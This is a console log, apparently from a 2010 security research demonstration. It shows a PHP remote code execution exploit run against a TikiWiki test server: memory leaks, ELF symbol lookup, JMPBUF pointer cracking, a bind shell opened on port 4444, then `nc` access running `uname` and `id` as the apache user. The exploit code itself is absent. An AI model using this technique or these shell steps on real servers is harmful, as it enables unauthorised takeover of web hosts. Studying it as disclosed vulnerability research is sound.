$ ./exploit.py -h http://t.testsystem/
PHP xxx() Remote Code Execution Exploit (TikiWiki Version)
Copyright (C) 2010 Stefan Esser/SektionEins GmbH
*** DO NOT DISTRIBUTE ***
[+] Connecting to determine wordsize
[+] Wordsize is 32 bit
[+] Connecting to determine PHP 5.2.x vs. PHP 5.3.x
[+] PHP version is 5.3.x
[+] Connecting to determine XXX version
[+] PHP version >= 5.3.2
[+] Determining endianess of system
[+] System is little endian
[+] Leaking address of std_object_handlers
[+] Found std_object_handlers address to be 0xb76e84a0
[+] Leaking std_object_handlers
[+] Retrieved std_object_handlers (0xb75b5c60, 0xb75b6230, 0xb75b2300, 0xb75b4c70, 0xb75b52f0, 0xb75b3fc0, 0xb75b42b0, 0xb75b4430, 0x00000000, 0x00000000, 0xb75b3c60, 0xb75b4a40, 0xb75b57a0, 0xb75b4170, 0xb75b27d0, 0xb75b4f00, 0x00000000, 0xb75b28a0, 0xb75b27a0, 0xb75b2af0, 0xb75b2830, 0xb75b46b0, 0x00000000, 0x00000000, 0xb75b2be0)
[+] Optimized to 0xb74008f0
[+] Scanning for executable header
[+] ELF header found at 0xb73ab000
[+] Retrieving and parsing ELF header
[+] Retrieving program headers
[+] Retrieving ELF string table
[+] Looking up ELF symbol: executor_globals
[+] Found executor_globals at 0xb76fe280
[+] Looking up ELF symbol: php_execute_script
[+] Found php_execute_script at 0xb75386c0
[+] Looking up ELF symbol: zend_eval_string
[+] Found zend_eval_string at 0xb7586580
[+] Searching JMPBUF in executor_globals
[+] Found JMPBUF at 0xbfcc64b4
[+] Attempt to crack JMPBUF
[+] Determined stored EIP value 0xb753875a from pattern match
[+] Calculated XORER 0x68ab06ea
[+] Unmangled stored ESP is 0xbfcc5470
[+] Checking memory infront of JMPBUF for overwriting possibilities
[+] Found 0x28 at 0xbfcc6498 (0x3e4) using it as overwrite trampoline
[+] Returning into PHP... Spawning a shell at port 4444
...
$ nc t.testsystem 4444
Welcome to the PHPShell 5/22/2010 1:27 am
system("uname -a");
Linux fedora13x86 2.6.33.4-95.fc13.i686.PAE #1 SMP Thu May 13 05:38:26 UTC 2010 i686 i686 i386 GNU/Linux
system("id");
uid=48(apache) gid=484(apache) groups=484(apache) context=unconfined_u:system_r:httpd_t:s0
...